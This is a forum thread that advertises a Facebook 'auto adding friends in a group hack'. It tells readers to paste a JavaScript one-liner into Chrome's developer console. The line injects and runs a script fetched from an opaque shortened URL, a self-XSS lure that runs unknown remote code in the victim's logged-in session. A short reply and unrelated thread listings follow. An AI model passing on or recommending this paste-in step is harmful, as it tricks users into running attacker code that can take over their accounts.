Register for your free account! | Forgot your password?

Go Back   elitepvpers > Other Online Games > Browsergames > Facebook
You last visited: Today at 02:26

• Please register to post and access all features, it's quick, easy and FREE!

Advertisement

Auto Adding Friends In A Group Hack Working :)

Discussion on Auto Adding Friends In A Group Hack Working :) within the Facebook forum part of the Browsergames category.

Closed Thread

Old   #1

elite*gold: 0
Auto Adding Friends In A Group Hack Working :)

new way of adding friends in a group

for google chrome

Press F12 then go to console

copy + paste this

Quote:
document.body.appendChild (document.createElement ('script')). src = 'https://j.mp/Qym9gy';
then press "enter" and wait

Old 11/04/2012, 06:51   #2

elite*gold: 0
ahah Old school xD
Closed Thread

Similar Threads Similar Threads
[Question] adding 2 different auto scripts to server
09/16/2010 - EO PServer Hosting - 8 Replies
Well here is the question i am wanting to no if there is any way to add to auto's to server. Here is what i mean most servers have either auto eps or auto pps. In them well i am wanting to put both of them in mine. An i am not exactly sure if it would work. But say i copied the monstertype in the data base and maid it have monstertype2 could you do it then. Or is there a way to do it without that. If anyone has a idea on how to do it can you please help me out. Or point me in the right...
UCE guide for 2moons Working vac,wall hack, speed hack & auto pots
10/01/2009 - Dekaron Exploits, Hacks, Bots, Tools & Macros - 713 Replies
Edited by kikichan for ads.
[Request] Guilds, Friends, Marriage, Auto Restart
07/02/2009 - CO2 Private Server - 8 Replies
Hi everyone! I'd like some help fixing my code for these sections. I use PowerSource. I would appreciate any code given, and any explanations on how to figure it out would be great. Guilds - The name 'DataBase' does not exist in the current context in Guild.cs, line 32, 156, 179, 192, 236 Character.cs, line 1646 Friends - I can only find code for LOTF source. As is, friends will randomly disappear off the friend list. I think it's a problem packing or unpacking the list. ...
Friends & others auto detection
09/15/2008 - Silkroad Online - 3 Replies
I hope I'm right here and first of all, Hi there ;) I'm from Germany and start a new SRO Character the 3rd time, had a lvl 27 and 39 before... My question is if there's a hack/tool/utility which shows you the coordinates/position of your friends without being in a party or something like that. I asked that some time before in another forum, but they didn't know anyhting about such a thing. You know one?